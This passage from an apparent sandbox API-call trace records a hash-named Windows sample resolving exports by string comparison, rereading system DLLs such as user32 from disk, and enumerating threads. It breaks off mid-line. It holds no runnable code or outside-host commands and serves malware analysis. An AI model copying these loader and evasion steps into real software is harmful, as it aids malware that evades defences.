(lpString1="NetAccessEnum", lpString2="I_BrowserDebugCall") returned 1 [0233.907] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugTrace") returned 1 [0233.907] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0233.907] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryOtherDomains") returned 1 [0233.907] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryStatistics") returned 1 [0233.907] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetNetlogonState") returned 1 [0233.907] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetStatistics") returned 1 [0233.907] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserServerEnum") returned 1 [0233.907] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserSetNetlogonState") returned 1 [0233.907] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0233.907] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountDeltas") returned 1 [0233.907] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountSync") returned 1 [0233.907] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes") returned 1 [0233.907] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes2") returned 1 [0233.907] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseDeltas") returned 1 [0233.907] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseRedo") returned 1 [0233.907] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync") returned 1 [0233.907] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync2") returned 1 [0233.907] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsGetVersion") returned 1 [0233.907] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsIsThisADomainName") returned 1 [0233.907] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetDCList") returned 1 [0233.907] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetForestTrustInformation") returned 1 [0233.907] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl") returned 1 [0233.907] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl2") returned 1 [0233.907] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonGetDomainInfo") returned 1 [0233.907] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogoff") returned 1 [0233.907] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogon") returned 1 [0233.907] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonEx") returned 1 [0233.907] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0233.908] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSendToSam") returned 1 [0233.908] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogoff") returned 1 [0233.908] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogon") returned 1 [0233.908] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate") returned 1 [0233.908] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate2") returned 1 [0233.908] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate3") returned 1 [0233.908] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerGetTrustInfo") returned 1 [0233.908] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordGet") returned 1 [0233.908] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet") returned 1 [0233.908] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet2") returned 1 [0233.908] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerReqChallenge") returned 1 [0233.908] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBits") returned 1 [0233.908] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0233.908] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0233.908] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeClientDigest") returned 1 [0233.908] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeServerDigest") returned 1 [0233.908] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessAdd") returned 1 [0233.908] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessDel") returned 1 [0233.908] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessEnum") returned 0 [0233.908] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavAddConnection") returned 1 [0233.908] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavDeleteConnection") returned 1 [0233.908] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavFlushFile") returned 1 [0233.908] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetExtendedError") returned 1 [0233.908] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetHTTPFromUNCPath") returned 1 [0233.908] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetUNCFromHTTPPath") returned 1 [0233.908] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesA") returned 1 [0233.909] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExA") returned 1 [0233.909] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExW") returned 1 [0233.913] GetProcessHeap () returned 0x480000 [0233.913] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2d45030 | out: hHeap=0x480000) returned 1 [0233.913] GetProcessHeap () returned 0x480000 [0233.913] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x10) returned 0x499900 [0233.913] LoadLibraryA (lpLibFileName="Shlwapi.dll") returned 0x7ffc5e7b0000 [0233.914] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0233.914] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0233.914] GetModuleFileNameA (in: hModule=0x7ffc5e7b0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")) returned 0x1f [0233.914] CreateFileA (lpFileName="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0233.914] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0233.915] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0233.915] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=332104) returned 1 [0233.915] GetProcessHeap () returned 0x480000 [0233.915] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x51148) returned 0x2d45030 [0233.915] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0233.915] ReadFile (in: hFile=0x17c, lpBuffer=0x2d45030, nNumberOfBytesToRead=0x51148, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d45030*, lpNumberOfBytesRead=0x14f5a4*=0x51148, lpOverlapped=0x0) returned 1 [0234.929] CloseHandle (hObject=0x17c) returned 1 [0234.951] GetProcessHeap () returned 0x480000 [0234.951] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2d45030 | out: hHeap=0x480000) returned 1 [0234.951] GetProcessHeap () returned 0x480000 [0234.951] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x10) returned 0x499960 [0234.951] LoadLibraryA (lpLibFileName="User32.dll") returned 0x7ffc5e960000 [0234.952] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0234.952] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0234.952] GetModuleFileNameA (in: hModule=0x7ffc5e960000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0234.952] CreateFileA (lpFileName="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0234.953] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0234.953] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0234.953] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1398200) returned 1 [0234.953] GetProcessHeap () returned 0x480000 [0234.953] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x1555b8) returned 0x4105040 [0235.272] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0235.272] ReadFile (in: hFile=0x17c, lpBuffer=0x4105040, nNumberOfBytesToRead=0x1555b8, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4105040*, lpNumberOfBytesRead=0x14f5a4*=0x1555b8, lpOverlapped=0x0) returned 1 [0235.325] CloseHandle (hObject=0x17c) returned 1 [0236.575] GetProcessHeap () returned 0x480000 [0236.576] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4105040 | out: hHeap=0x480000) returned 1 [0236.598] GetProcessHeap () returned 0x480000 [0236.598] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x10) returned 0x499a20 [0236.598] LoadLibraryA (lpLibFileName="KtmW32.dll") returned 0x7ffc4bf10000 [0236.605] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0236.606] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0236.606] GetModuleFileNameA (in: hModule=0x7ffc4bf10000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")) returned 0x1e [0236.606] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0236.606] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0236.606] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0236.606] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=24064) returned 1 [0236.606] GetProcessHeap () returned 0x480000 [0236.606] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x5e00) returned 0x2d45030 [0236.607] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0236.607] ReadFile (in: hFile=0x17c, lpBuffer=0x2d45030, nNumberOfBytesToRead=0x5e00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d45030*, lpNumberOfBytesRead=0x14f5a4*=0x5e00, lpOverlapped=0x0) returned 1 [0236.608] CloseHandle (hObject=0x17c) returned 1 [0236.610] GetProcessHeap () returned 0x480000 [0236.610] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2d45030 | out: hHeap=0x480000) returned 1 [0236.902] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameW") returned 0x7ffc5ecf4840 [0236.902] GetModuleFileNameW (in: hModule=0x7ffc45e90000, lpFilename=0x180013b88, nSize=0x104 | out: lpFilename="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll")) returned 0x62 [0236.902] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x1000) returned 0x2d45030 [0236.904] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x22) returned 0x4883e0 [0236.904] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="opj_end_compress", cchWideChar=-1, lpMultiByteStr=0x4883e0, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opj_end_compress", lpUsedDefaultChar=0x0) returned 17 [0236.904] GetLastError () returned 0x0 [0236.904] SetLastError (dwErrCode=0x0) [0236.940] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_end_compressW") returned 0x0 [0236.940] GetLastError () returned 0x7f [0236.940] SetLastError (dwErrCode=0x7f) [0236.940] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_end_compressA") returned 0x0 [0236.940] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_end_compress") returned 0x7ffc45f1a6e0 [0236.940] GetActiveWindow () returned 0x0 [0236.940] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2d45030 | out: hHeap=0x480000) returned 1 [0236.940] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x4883e0 | out: hHeap=0x480000) returned 1 [0236.940] GetCurrentProcessId () returned 0x10e8 [0236.940] GetCurrentThreadId () returned 0x10ec [0236.940] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x17c [0236.960] Thread32First (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.961] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.962] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.963] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.963] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.964] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.965] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.966] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.967] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.967] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.968] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.969] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.970] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.971] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.159] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.160] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.160] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.161] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.161] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.162] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.163] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.163] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.164] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.165] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.165] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.166] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.166] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.167] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.167] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.168] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.169] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.169] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.170] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.170] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.171] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.171] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.172] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.173] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.173] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.174] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.175] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.175] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.176] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.177] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.177] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.178] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.178] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.179] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.179] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.180] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.181] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.181] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.182] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.183] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.183] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.184] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.185] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.185] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.186] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.187] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.188] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.189] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.189] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.190] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.191] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.191] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.192] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.193] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.194] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.427] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.428] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.429] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.430] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.430] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.431] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.432] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.432] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.433] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.434] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.434] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.435] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.436] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.437] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.438] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.438] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.439] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.440] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.441] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.441] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.442] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.443] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.443] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.444] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.445] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.445] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.446] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.447] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.447] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.448] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.448] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.449] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.450] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.451] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.452] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.453] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.454] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.454] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.455] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.456] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.457] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.457] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.458] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.459] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.460] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.461] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.461] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.462] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.463] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.684] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.685] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.686] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.686] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.687] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.688] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.688] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.689] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.689] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.690] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.690] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.691] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.692] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.692] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.693] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.694] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.694] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.695] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.696] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.696] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.697] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.698] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.698] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.699] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.700] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.700] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.701] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.701] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.702] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.703] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.703] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.704] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.704] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.708] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.708] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.709] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.709] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.710] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.711] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.711] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.712] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.712] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.713] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.713] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.714] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.715] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.715] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.716] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.716] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.717] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.718] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.718] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.719] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.720] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.875] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.876] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.877] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.878] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.879] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.880] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.881] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.881] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.882] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.882] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.883] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.883] Thread32Next 